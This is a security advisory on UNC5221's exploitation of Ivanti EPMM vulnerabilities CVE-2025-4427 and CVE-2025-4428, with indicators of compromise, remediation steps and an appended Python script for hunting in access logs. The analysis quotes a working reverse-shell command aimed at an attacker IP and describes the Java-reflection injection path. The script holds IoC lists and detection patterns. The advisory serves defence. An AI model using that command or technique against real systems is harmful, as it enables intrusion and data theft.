Severity
High
Analysis Summary
A highly sophisticated cyber-espionage campaign, attributed to the China-linked group UNC5221, has been exploiting critical zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) since May 15, 2025. The attackers are leveraging CVE-2025-4427 and CVE-2025-4428, which together allow unauthenticated remote code execution, targeting high-value sectors such as healthcare, telecommunications, aviation, finance, municipal governance, and defense.
The exploitation has impacted organizations across Europe, North America, and the Asia-Pacific region, including UK healthcare trusts, Scandinavian municipal agencies, U.S. medical device manufacturers, German telecom providers, and Japanese automotive suppliers. The attackers specifically target enterprises managing large mobile device fleets, exploiting EPMM’s central role in device management to potentially compromise thousands of endpoints.
According to the researchers, UNC5221 demonstrates a deep understanding of EPMM's internal architecture, repurposing legitimate system components to exfiltrate sensitive data such as personally identifiable information (PII), authentication credentials, and confidential organizational assets. The group has deployed advanced malware such as KrustyLoader, which retrieves encrypted Sliver backdoors from AWS S3 buckets, as well as Fast Reverse Proxy (FRP) tooling for persistent access and lateral movement. This operational sophistication and broad targeting suggest a state-sponsored agenda focused on long-term espionage and data collection rather than immediate financial gain.
Initial access is achieved through a critical unauthenticated RCE vulnerability in the /mifs/rs/api/v2/ endpoint, where attackers inject malicious Java-based payloads via the format= parameter. These payloads use Java reflection techniques embedded in HTTP GET requests to invoke Runtime.getRuntime().exec(), allowing arbitrary command execution. For instance, commands such as bash -i >& /dev/tcp/64.52.80.21/4444 0>&1 establish reverse shells for remote command-line access. The threat actors keep their communication channels open by ensuring the injected Java threads remain active until the spawned processes complete, thereby preserving control over compromised systems.
To enhance their foothold and gather command output in real time, the attackers employ dual Java injection methods. In addition to executing commands, they use Scanner objects to capture the output directly from the executed processes. This approach allows immediate feedback and reliable command-and-control operations via server-side Java injection. The rapid weaponization of new vulnerabilities, coupled with the precision and scale of the intrusions, underscores UNC5221’s advanced capabilities and strategic intent, making this one of the most significant global espionage campaigns of 2025.
Impact
- Sensitive Credential Theft
- Information Disclosure
- Code Execution
- Gain Access
- Financial Loss
Indicators of Compromise
CVE
- CVE-2025-4427
- CVE-2025-4428
IP
- 103.244.88.125
- 27.25.148.183
- 146.70.87.67
- 124.223.202.90
URL
- https://dpaste.com/9MQEJ6VYR.txt
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Immediately apply security updates as provided by Ivanti.
- Temporarily remove any exposed or unpatched EPMM systems from the internet-facing network segments.
- Look for suspicious activity on the /mifs/rs/api/v2/ endpoint, especially with anomalous format= parameters or Base64-encoded payloads.
- Deploy IDS/IPS signatures to detect Sliver backdoor traffic, reverse shells (e.g., bash -i patterns), and use of Fast Reverse Proxy (FRP).
- Watch for unusual connections to IPs such as 64.52.80.21 or unexplained traffic to AWS S3 buckets.
- Identify and hunt for indicators related to KrustyLoader, Sliver, and Java-based reflection payloads.
- Investigate systems for unauthorized command execution, reverse shell artifacts, and encoded payloads in Java processes.
- Look for attempts to gain higher access levels post-exploitation.
- Ensure management interfaces like EPMM are behind VPNs or restricted via firewall rules.
- Disable Java reflection where possible and sanitize user input rigorously.
- Implement micro-segmentation to reduce lateral movement opportunities in case of a breach.
- Verify all user and device actions continuously and enforce least privilege access.
- Establish a proactive vulnerability management process for all critical infrastructure components.
- Test detection and response capabilities against simulated Java RCE and lateral movement scenarios.
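The endpoint-monitoring and IP-watch items above can be turned into a simple hunt over web-server access logs. The script below is an added example and not part of this advisory or Ivanti's tooling; it assumes Combined Log Format input, uses the IPs listed in this advisory as its IoC set, and the log lines (including the /mifs/rs/api/v2/sample path and the base64-looking filler) are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# IPs taken from the Indicators of Compromise and Remediation sections of this advisory.
IOC_IPS = {"103.244.88.125", "27.25.148.183", "146.70.87.67", "124.223.202.90", "64.52.80.21"}

TARGET_PREFIX = "/mifs/rs/api/v2/"
# Substrings of the Java reflection chain named in the analysis (Runtime.getRuntime().exec()).
JAVA_TOKENS = ("runtime", "getruntime", "exec(", "class.forname", "invoke(")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not real traffic); the base64-looking value is harmless filler.
FILLER = "QUFB" * 15
SAMPLE_LOG = f"""\
10.0.0.5 - - [16/May/2025:10:01:02 +0000] "GET /mifs/rs/api/v2/sample?format=json HTTP/1.1" 200 512 "-" "EPMM-Agent"
103.244.88.125 - - [16/May/2025:10:02:15 +0000] "GET /mifs/rs/api/v2/sample?format=Runtime.getRuntime%28%29.exec HTTP/1.1" 200 88 "-" "curl/8.0"
10.0.0.7 - - [16/May/2025:10:03:40 +0000] "GET /mifs/rs/api/v2/sample?format={FILLER} HTTP/1.1" 200 64 "-" "python-requests/2.31"
10.0.0.9 - - [16/May/2025:10:04:01 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def analyze_line(line: str) -> list[str]:
    """Return the reason tags for one access-log line; an empty list means nothing suspicious."""
    m = CLF_RE.match(line)
    if not m:
        return []
    reasons = []
    if m["ip"] in IOC_IPS:
        reasons.append("ioc-ip")
    url = urlsplit(m["target"])
    if not url.path.startswith(TARGET_PREFIX):
        return reasons
    # parse_qs percent-decodes, so encoded parentheses and dots are inspected in clear text.
    for value in parse_qs(url.query, keep_blank_values=True).get("format", []):
        low = value.lower()
        if any(tok in low for tok in JAVA_TOKENS):
            reasons.append("java-reflection-in-format")
        elif BASE64_RE.match(value):
            reasons.append("base64-blob-in-format")
        elif len(value) > 64:
            reasons.append("oversized-format")
    return reasons


def scan(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (source_ip, reasons) for every flagged line in the log text."""
    return [(ln.split()[0], analyze_line(ln)) for ln in log_text.splitlines() if analyze_line(ln)]
```

The benign format=json request and the unrelated login page are not flagged, while the IoC-sourced reflection attempt and the oversized base64-style value are reported with their reasons.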